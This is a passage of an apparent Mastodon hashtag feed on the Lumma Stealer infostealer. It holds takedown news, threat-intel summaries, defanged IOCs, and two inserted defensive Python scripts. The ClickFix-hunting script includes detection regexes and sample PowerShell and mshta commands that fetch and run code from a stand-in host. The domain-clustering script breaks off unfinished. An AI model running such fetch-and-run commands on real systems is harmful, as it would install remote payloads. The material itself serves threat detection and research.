mstdn.social is one of the many independent Mastodon servers you can use to participate in the fediverse.
#lummastealer

ESET Research<p>In May 2025, <a href="https://infosec.exchange/tags/ESET" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESET</span></a> participated in operations that largely disrupted the infrastructure of two notorious infostealers: <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> and <a href="https://infosec.exchange/tags/Danabot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Danabot</span></a>. <br>As part of the Lumma Stealer disruption effort, carried out in conjunction with Microsoft, BitSight, Lumen, Cloudflare, CleanDNS, and GMO Registry, ESET supplied technical analysis and statistical information. <br>Danabot was targeted by the <a href="https://infosec.exchange/tags/FBI" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>FBI</span></a> and <a href="https://infosec.exchange/tags/DCIS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DCIS</span></a>, alongside <a href="https://infosec.exchange/tags/OperationEndgame" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OperationEndgame</span></a> led by <a href="https://infosec.exchange/tags/Europol" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Europol</span></a> and <a href="https://infosec.exchange/tags/Eurojust" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Eurojust</span></a>. ESET participated together with several other companies. We provided the analysis of the malware’s backend infrastructure and identified its C&amp;C servers. 
<br>Before these takedowns, both infostealers were on the rise: in H1 2025, Lumma Stealer detections grew by 21%, while Danabot’s numbers increased by more than 50%.<br> For a time, Lumma Stealer was the primary payload of HTML/FakeCaptcha trojan, used in the <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ClickFix</span></a> social engineering attacks that we also cover in this issue of the <a href="https://infosec.exchange/tags/ESETThreatReport" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESETThreatReport</span></a>. In recent months, we have seen Danabot being delivered via ClickFix as well. <br>For more details on these two operations and on the ClickFix attacks, read the latest <a href="https://infosec.exchange/tags/ESETThreatReport" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESETThreatReport</span></a>: <a href="https://welivesecurity.com/en/eset-research/eset-threat-report-h1-2025" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">welivesecurity.com/en/eset-res</span><span class="invisible">earch/eset-threat-report-h1-2025</span></a></p>
OTX Bot<p>Fix the Click: Preventing the ClickFix Attack Vector</p><p>This article discusses the rising threat of ClickFix, a social engineering technique used by threat actors to trick victims into executing malicious commands under the guise of quick fixes for computer issues. The technique has been observed in campaigns distributing various malware, including NetSupport RAT, Latrodectus, and Lumma Stealer. ClickFix lures often use clipboard hijacking and can bypass standard detection controls. The article provides case studies of recent campaigns, hunting tips for detecting ClickFix infections, and recommendations for proactive defense measures. It emphasizes the importance of user education and implementing robust security controls to mitigate this evolving threat.</p><p>Pulse ID: 686ffe0f30bfbdfa037e4168<br>Pulse Link: <a href="https://otx.alienvault.com/pulse/686ffe0f30bfbdfa037e4168" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">otx.alienvault.com/pulse/686ff</span><span class="invisible">e0f30bfbdfa037e4168</span></a> <br>Pulse Author: AlienVault<br>Created: 2025-07-10 17:53:19</p><p>Be advised, this data is unverified and should be considered preliminary. 
Always do further verification.</p><p><a href="https://social.raytec.co/tags/Clipboard" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Clipboard</span></a> <a href="https://social.raytec.co/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://social.raytec.co/tags/Education" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Education</span></a> <a href="https://social.raytec.co/tags/InfoSec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>InfoSec</span></a> <a href="https://social.raytec.co/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://social.raytec.co/tags/Malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Malware</span></a> <a href="https://social.raytec.co/tags/NetSupport" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>NetSupport</span></a> <a href="https://social.raytec.co/tags/NetSupportRAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>NetSupportRAT</span></a> <a href="https://social.raytec.co/tags/OTX" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OTX</span></a> <a href="https://social.raytec.co/tags/OpenThreatExchange" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OpenThreatExchange</span></a> <a href="https://social.raytec.co/tags/RAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RAT</span></a> <a href="https://social.raytec.co/tags/SocialEngineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SocialEngineering</span></a> <a href="https://social.raytec.co/tags/bot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>bot</span></a> <a href="https://social.raytec.co/tags/AlienVault" class="mention hashtag" rel="nofollow noopener" 
target="_blank">#<span>AlienVault</span></a></p>
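The hunting tips the OTX summary refers to are not reproduced on this page, so here is an added example of one such check, written for this page and not taken from the AlienVault pulse or the article it summarizes. It runs ClickFix-style command-line indicators over two constructed telemetry sources: Sysmon process-creation records (a command pasted into Win+R is spawned with explorer.exe as parent) and the HKCU Explorer RunMRU values Windows keeps for the Run dialog. The indicator list, the process names and all sample events are assumptions to tune for your own estate; example.invalid is a reserved name that never resolves.

```python
"""Hunt for ClickFix-style execution: commands pasted into the Win+R dialog.

Two telemetry sources, both constructed inline for this example:
  * Sysmon Event ID 1 (process creation) as parent / child / command-line triples;
  * HKCU\\...\\Explorer\\RunMRU values, which Windows writes for every Win+R command
    (each value carries a trailing "\\1" suffix).
"""
import ntpath
import re

# Binaries a pasted ClickFix one-liner typically starts with (assumption: tune per estate).
RUN_DIALOG_LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                      "curl.exe", "wscript.exe", "cscript.exe"}

# Command-line traits seen across ClickFix lures; each entry is (regex, label).
INDICATORS = [
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "iex cradle"),
    (re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I), "web fetch"),
    (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I), "mshta remote HTA"),
    (re.compile(r"\bcurl(?:\.exe)?\b.*\|", re.I), "curl piped to interpreter"),
    (re.compile(r"not a robot|recaptcha|verification id", re.I), "captcha lure comment"),
]


def score_command(cmdline: str) -> list[str]:
    """Return the label of every indicator that matches the command line."""
    return [label for rx, label in INDICATORS if rx.search(cmdline)]


def detect(events: list[dict]) -> list[dict]:
    """Emit one alert per suspicious event.

    Sysmon: explorer.exe parent (the Run dialog) + a LOLBIN child + any indicator,
    or two or more indicators regardless of parent.
    RunMRU: any indicator at all, since legitimate Run history is short names
    such as "cmd" or UNC paths.
    """
    alerts = []
    for ev in events:
        if ev["source"] == "sysmon_1":
            parent = ntpath.basename(ev["ParentImage"]).lower()
            child = ntpath.basename(ev["Image"]).lower()
            hits = score_command(ev["CommandLine"])
            from_run_dialog = parent == "explorer.exe" and child in RUN_DIALOG_LOLBINS
            if (from_run_dialog and hits) or len(hits) >= 2:
                alerts.append({"source": "sysmon_1", "image": child,
                               "indicators": hits, "command": ev["CommandLine"]})
        elif ev["source"] == "runmru":
            cmd = ev["Value"].removesuffix("\\1")
            hits = score_command(cmd)
            if hits:
                alerts.append({"source": "runmru", "image": cmd.split()[0].lower(),
                               "indicators": hits, "command": cmd})
    return alerts


# Constructed sample telemetry (not from any real incident); example.invalid never resolves.
SAMPLE_EVENTS = [
    {"source": "sysmon_1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex(irm https://example.invalid/verify.txt)" '
                    '# "I am not a robot - reCAPTCHA Verification ID: 7811"'},
    {"source": "sysmon_1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\bob\notes.txt"},
    {"source": "sysmon_1", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"source": "runmru", "Value": "mshta https://example.invalid/captcha.hta\\1"},
    {"source": "runmru", "Value": "cmd\\1"},
    {"source": "runmru", "Value": r"\\fileserver\share" + "\\1"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['source']}] {a['image']}: {', '.join(a['indicators'])}")
```

The explorer.exe-parent rule is deliberately narrow: a scheduled backup started from cmd.exe with `-ExecutionPolicy Bypass` scores no indicators and stays quiet, while the RunMRU rule fires on a bare `mshta https://...` because that string has no business in a user's Run history.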
Pyrzout :vm:<p>Hackers weaponize Shellter red teaming tool to spread infostealers – Source: securityaffairs.com <a href="https://ciso2ciso.com/hackers-weaponize-shellter-red-teaming-tool-to-spread-infostealers-source-securityaffairs-com/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">ciso2ciso.com/hackers-weaponiz</span><span class="invisible">e-shellter-red-teaming-tool-to-spread-infostealers-source-securityaffairs-com/</span></a> <a href="https://social.skynetcloud.site/tags/rssfeedpostgeneratorecho" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rssfeedpostgeneratorecho</span></a> <a href="https://social.skynetcloud.site/tags/informationsecuritynews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>informationsecuritynews</span></a> <a href="https://social.skynetcloud.site/tags/ITInformationSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ITInformationSecurity</span></a> <a href="https://social.skynetcloud.site/tags/SecurityAffairscom" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecurityAffairscom</span></a> <a href="https://social.skynetcloud.site/tags/CyberSecurityNews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurityNews</span></a> <a href="https://social.skynetcloud.site/tags/PierluigiPaganini" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>PierluigiPaganini</span></a> <a href="https://social.skynetcloud.site/tags/SecurityAffairs" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecurityAffairs</span></a> <a href="https://social.skynetcloud.site/tags/SecurityAffairs" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SecurityAffairs</span></a> <a href="https://social.skynetcloud.site/tags/BreakingNews" class="mention hashtag" rel="nofollow noopener" 
target="_blank">#<span>BreakingNews</span></a> <a href="https://social.skynetcloud.site/tags/lummastealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>lummastealer</span></a> <a href="https://social.skynetcloud.site/tags/hackingnews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>hackingnews</span></a> <a href="https://social.skynetcloud.site/tags/Cybercrime" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Cybercrime</span></a> <a href="https://social.skynetcloud.site/tags/Security" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Security</span></a> <a href="https://social.skynetcloud.site/tags/SHELLTER" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SHELLTER</span></a> <a href="https://social.skynetcloud.site/tags/hacking" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>hacking</span></a> <a href="https://social.skynetcloud.site/tags/Malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Malware</span></a></p>
Brad<p>2025-07-02 (Wednesday): Another <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> infection with follow-up <a href="https://infosec.exchange/tags/Rsockstun" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Rsockstun</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a>. </p><p>The <a href="https://infosec.exchange/tags/Lumma" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumma</span></a> Stealer infection uses a password-protected 7-zip archive, a NullSoft installer, and <a href="https://infosec.exchange/tags/AutoItv3" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AutoItv3</span></a>. </p><p>Malware samples, a <a href="https://infosec.exchange/tags/pcap" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>pcap</span></a> and some IOCs are available at <a href="https://www.malware-traffic-analysis.net/2025/07/02/index.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">malware-traffic-analysis.net/2</span><span class="invisible">025/07/02/index.html</span></a></p>
Brad<p>2025-06-27 (Friday): I ran another <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> infection today. It was basically the same as yesterday, except for the follow-up malware.</p><p>I saw the same URL for hxxp[:]//86.54.25[.]40/sok.exe, but it returned a different file.</p><p>It generated the same type of C2 traffic over TCP port 16443, but it used a different domain for the C2 server at eset-blacklist[.]net. </p><p>Sample:</p><p>- <a href="https://bazaar.abuse.ch/sample/9dc1872510d70d954662b42c0e3bedb80e719272554efc0051cb727241a6cacb/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">bazaar.abuse.ch/sample/9dc1872</span><span class="invisible">510d70d954662b42c0e3bedb80e719272554efc0051cb727241a6cacb/</span></a></p><p>Sandbox analysis:</p><p>- <a href="https://www.joesandbox.com/analysis/1724473" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="">joesandbox.com/analysis/1724473</span><span class="invisible"></span></a></p><p>- <a href="https://tria.ge/250627-26apgask14" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">tria.ge/250627-26apgask14</span><span class="invisible"></span></a></p><p>- <a href="https://app.any.run/tasks/651d4998-807d-4ac2-821b-88061c288013" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">app.any.run/tasks/651d4998-807</span><span class="invisible">d-4ac2-821b-88061c288013</span></a></p>
Brad<p>2025-06-26 (Thursday): <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> infection leads to follow-up loader that retrieves a pen test tool hosted on Github and configures it as <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a>. </p><p>A <a href="https://infosec.exchange/tags/pcap" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>pcap</span></a> of the infection traffic, the associated malware, and IOCs are available at: <a href="https://www.malware-traffic-analysis.net/2025/06/26/index.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">malware-traffic-analysis.net/2</span><span class="invisible">025/06/26/index.html</span></a></p><p><a href="https://infosec.exchange/tags/Lumma" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumma</span></a></p>
The Threat Codex<p>Lumma meets LolzTeam<br><a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <br><a href="https://intelinsights.substack.com/p/lumma-meets-lolzteam" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">intelinsights.substack.com/p/l</span><span class="invisible">umma-meets-lolzteam</span></a></p>
Mateusz Chrobok<p>Usually I report to you (politely, of course) on leaks, thefts, espionage and other security disasters. But today? We have two gigantic wins in the war against cybercriminals - and with a Polish accent! 🦫 </p><p>In the new episode I talk about the spectacular takedown of LummaStealer and the blow dealt to Danabot - two malicious beasts that for years made life miserable for companies and ordinary users all over the world. How did they work? How were they unravelled? What were the consequences?</p><p>And most importantly - what does "fraud-as-a-service" actually look like behind the scenes, including prices, documentation and 24/7 customer support?</p><p>Episode produced in cooperation with ESET and DAGMA Bezpieczeństwo IT🦾 </p><p>Watch here 👇<br><a href="https://youtu.be/fcTdhBq4U88" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">youtu.be/fcTdhBq4U88</span><span class="invisible"></span></a> </p><p><a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://infosec.exchange/tags/Danabot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Danabot</span></a> <a href="https://infosec.exchange/tags/ESET" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESET</span></a> <a href="https://infosec.exchange/tags/DagmaBezpiecze%C5%84stwoIT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DagmaBezpieczeństwoIT</span></a></p>
OTX Bot<p>GitHub's Dark Side: Unveiling Malware Disguised as Cracks, Hacks, and Crypto Tools</p><p>Cybercriminals are exploiting GitHub's reputation to distribute malware, particularly targeting gamers and children. They create repositories offering game hacks, cracked software, and crypto tools, which actually contain Lumma Stealer variants. The attack chain begins with users searching for these products online, leading them to malicious GitHub repositories or YouTube videos. These repositories use social engineering tactics, including detailed descriptions, fake licenses, and instructions to disable antivirus software. The malware collects sensitive information from infected systems and transfers it to command-and-control servers. McAfee provides detection and mitigation strategies, emphasizing the importance of user education, regular software updates, and avoiding unofficial downloads.</p><p>Pulse ID: 6852b2411a397b8565ae8343<br>Pulse Link: <a href="https://otx.alienvault.com/pulse/6852b2411a397b8565ae8343" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">otx.alienvault.com/pulse/6852b</span><span class="invisible">2411a397b8565ae8343</span></a> <br>Pulse Author: AlienVault<br>Created: 2025-06-18 12:34:09</p><p>Be advised, this data is unverified and should be considered preliminary. 
Always do further verification.</p><p><a href="https://social.raytec.co/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://social.raytec.co/tags/Education" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Education</span></a> <a href="https://social.raytec.co/tags/GitHub" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>GitHub</span></a> <a href="https://social.raytec.co/tags/ICS" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ICS</span></a> <a href="https://social.raytec.co/tags/InfoSec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>InfoSec</span></a> <a href="https://social.raytec.co/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://social.raytec.co/tags/Malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Malware</span></a> <a href="https://social.raytec.co/tags/McAfee" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>McAfee</span></a> <a href="https://social.raytec.co/tags/OTX" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OTX</span></a> <a href="https://social.raytec.co/tags/OpenThreatExchange" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>OpenThreatExchange</span></a> <a href="https://social.raytec.co/tags/RAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RAT</span></a> <a href="https://social.raytec.co/tags/SocialEngineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SocialEngineering</span></a> <a href="https://social.raytec.co/tags/YouTube" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>YouTube</span></a> <a href="https://social.raytec.co/tags/bot" class="mention hashtag" rel="nofollow noopener" 
target="_blank">#<span>bot</span></a> <a href="https://social.raytec.co/tags/AlienVault" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AlienVault</span></a></p>
The Threat Codex<p>Group-IB contributes to INTERPOL’s Operation Secure, leading to the arrest of 32 suspects linked to information stealer malware in Asia<br><a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://infosec.exchange/tags/RisePro" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RisePro</span></a> <a href="https://infosec.exchange/tags/MetaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MetaStealer</span></a> <br><a href="https://www.group-ib.com/media-center/press-releases/interpol-infostealer-bust/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">group-ib.com/media-center/pres</span><span class="invisible">s-releases/interpol-infostealer-bust/</span></a></p>
Pyrzout :vm:<p>The strange tale of ischhfd83: When cybercriminals eat their own – Source: news.sophos.com <a href="https://ciso2ciso.com/the-strange-tale-of-ischhfd83-when-cybercriminals-eat-their-own-source-news-sophos-com/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">ciso2ciso.com/the-strange-tale</span><span class="invisible">-of-ischhfd83-when-cybercriminals-eat-their-own-source-news-sophos-com/</span></a> <a href="https://social.skynetcloud.site/tags/rssfeedpostgeneratorecho" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rssfeedpostgeneratorecho</span></a> <a href="https://social.skynetcloud.site/tags/CyberSecurityNews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurityNews</span></a> <a href="https://social.skynetcloud.site/tags/cybercrimeforums" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybercrimeforums</span></a> <a href="https://social.skynetcloud.site/tags/ThreatResearch" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ThreatResearch</span></a> <a href="https://social.skynetcloud.site/tags/nakedsecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>nakedsecurity</span></a> <a href="https://social.skynetcloud.site/tags/nakedsecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>nakedsecurity</span></a> <a href="https://social.skynetcloud.site/tags/lummastealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>lummastealer</span></a> <a href="https://social.skynetcloud.site/tags/SophosXOps" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SophosXOps</span></a> <a href="https://social.skynetcloud.site/tags/AsyncRAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AsyncRAT</span></a> <a href="https://social.skynetcloud.site/tags/backdoor" class="mention hashtag" 
rel="nofollow noopener" target="_blank">#<span>backdoor</span></a> <a href="https://social.skynetcloud.site/tags/FEATURED" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>FEATURED</span></a> <a href="https://social.skynetcloud.site/tags/asyncrat" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>asyncrat</span></a> <a href="https://social.skynetcloud.site/tags/Backdoor" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Backdoor</span></a> <a href="https://social.skynetcloud.site/tags/featured" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>featured</span></a></p>
Infoblox Threat Intel<p>Last week, Microsoft reported that their Digital Crimes Unit (DCU) and international partners disrupted Lumma Stealer by taking down 2,300 domains critical to the malware's operation. Shortly after, Palo Alto's Unit 42 reported about cyber campaigns that previously dropped Lumma Stealer are now distributing StealC infostealer payloads. We analyzed the DNS infrastructure related to the attacks and discovered a large number of malicious registered domain generation algorithm (RDGA) domains. Based on passive DNS, the threat actor that controls the infrastructure configured the domains to a staging environment via a dedicated Panama IP address (self-signed SSL) before deploying them. We identified 144 unique domains in this IP space, and all of them were detected as "suspicious" by our algorithms 1-2 months before they were activated for malicious activity.<br> <br>Disrupting criminal operations is difficult and they will find ways to resurface. However, this example proves that blocking connections at the DNS level can often protect users against the new versions before they emerge. The infostealer actors made a quick turn, but we were already blocking their path. Our specialty is in DNS analytics, so we use DNS signatures, as opposed to malware signatures, for preemptive security. We love this stuff.<br> <br>Here are some examples of the RDGA domains:<br>2323dot2[.]cfd, 2323dot2[.]cyou, 2323dot2[.]my, 232pip1[.]my, 232pip1[.]sbs, 832pip[.]cfd, 832pip[.]cyou, 832pip[.]my, 832pip[.]sbs, b3cloud[.]cfd, b3cloud[.]cyou, b3cloud[.]my, b3cloud[.]sbs, bin48[.]cfd, bin48[.]cyou, bin48[.]my, bin898293[.]cfd, bin898293[.]cyou, bin898293[.]my, bin898293[.]sbs, bit7dl[.]cfd, bit7dl[.]cyou, bit7dl[.]my, bit7dl[.]sbs, bot113cloud[.]cfd, bot113cloud[.]cyou, bot113cloud[.]my<br> <br>These campaigns share similar TTPs with those that we reported several months ago. 
The threat actor that we discussed in this post (<a href="https://infosec.exchange/@InfobloxThreatIntel/114027715851469775" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">infosec.exchange/@InfobloxThre</span><span class="invisible">atIntel/114027715851469775</span></a>) also distributed Lumma Stealer and used RDGA domains, but incorporated additional components, such as traffic distribution systems (TDS), web trackers, and cloakers.<br> <br> <br><a href="https://infosec.exchange/tags/dns" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>dns</span></a> <a href="https://infosec.exchange/tags/threatintel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>threatintel</span></a> <a href="https://infosec.exchange/tags/threatintelligence" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>threatintelligence</span></a> <a href="https://infosec.exchange/tags/cybercrime" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybercrime</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/infoblox" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infoblox</span></a> <a href="https://infosec.exchange/tags/infobloxthreatintel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infobloxthreatintel</span></a> <a href="https://infosec.exchange/tags/infostealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infostealer</span></a> <a href="https://infosec.exchange/tags/lummastealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>lummastealer</span></a> <a 
href="https://infosec.exchange/tags/stealc" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>stealc</span></a> <a href="https://infosec.exchange/tags/tds" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>tds</span></a> <a href="https://infosec.exchange/tags/tracker" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>tracker</span></a> <a href="https://infosec.exchange/tags/cloaker" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cloaker</span></a> <a href="https://infosec.exchange/tags/rdga" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rdga</span></a></p>
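As an added illustration of the clustering idea in the Infoblox post (this is example code written for this page, not Infoblox's code or algorithm): the 27 example domains above share a handful of second-level labels registered across the same small set of TLDs, and the labels follow a few digit-plus-word templates. The script below groups a defanged domain list by label and by masked-digit template. The TLD watch-list, the thresholds, and the two example.com/example.net control entries are assumptions.

```python
"""Group candidate RDGA domains by shared label and by label template.

Input is a defanged domain list (label[.]tld); output is two views:
  * the same label registered under several watched TLDs (one actor buying a name in bulk);
  * labels that collapse to the same template once digit runs are masked.
"""
import re
from collections import defaultdict

# TLDs the family in the post used, plus a few commonly abused ones (assumption: tune per environment).
WATCHED_TLDS = {"cfd", "cyou", "my", "sbs", "xyz", "top", "shop", "icu"}


def split_domain(domain: str) -> tuple[str, str]:
    """Return (label, tld) for a plain or defanged domain such as 'bin48[.]cfd'."""
    d = domain.replace("[.]", ".").lower().strip(".")
    label, _, tld = d.rpartition(".")
    return label, tld


def label_template(label: str) -> str:
    """Mask digit runs so 2323dot2 and 232pip1 compare as '#dot#' and '#pip#'."""
    return re.sub(r"\d+", "#", label)


def families_by_tld(domains: list[str], min_tlds: int = 2) -> dict[str, list[str]]:
    """Labels seen under at least min_tlds watched TLDs, with the TLDs they appear in."""
    tlds_for = defaultdict(set)
    for d in domains:
        label, tld = split_domain(d)
        tlds_for[label].add(tld)
    return {label: sorted(t & WATCHED_TLDS)
            for label, t in tlds_for.items() if len(t & WATCHED_TLDS) >= min_tlds}


def families_by_template(domains: list[str]) -> dict[str, list[str]]:
    """Templates shared by two or more distinct labels once digits are masked."""
    labels_for = defaultdict(set)
    for d in domains:
        label, _ = split_domain(d)
        labels_for[label_template(label)].add(label)
    return {tpl: sorted(ls) for tpl, ls in labels_for.items() if len(ls) >= 2}


# The 27 defanged examples from the post, plus two constructed benign controls on reserved names.
SAMPLE_DOMAINS = [
    "2323dot2[.]cfd", "2323dot2[.]cyou", "2323dot2[.]my", "232pip1[.]my", "232pip1[.]sbs",
    "832pip[.]cfd", "832pip[.]cyou", "832pip[.]my", "832pip[.]sbs",
    "b3cloud[.]cfd", "b3cloud[.]cyou", "b3cloud[.]my", "b3cloud[.]sbs",
    "bin48[.]cfd", "bin48[.]cyou", "bin48[.]my",
    "bin898293[.]cfd", "bin898293[.]cyou", "bin898293[.]my", "bin898293[.]sbs",
    "bit7dl[.]cfd", "bit7dl[.]cyou", "bit7dl[.]my", "bit7dl[.]sbs",
    "bot113cloud[.]cfd", "bot113cloud[.]cyou", "bot113cloud[.]my",
    "example.com", "example.net",
]

if __name__ == "__main__":
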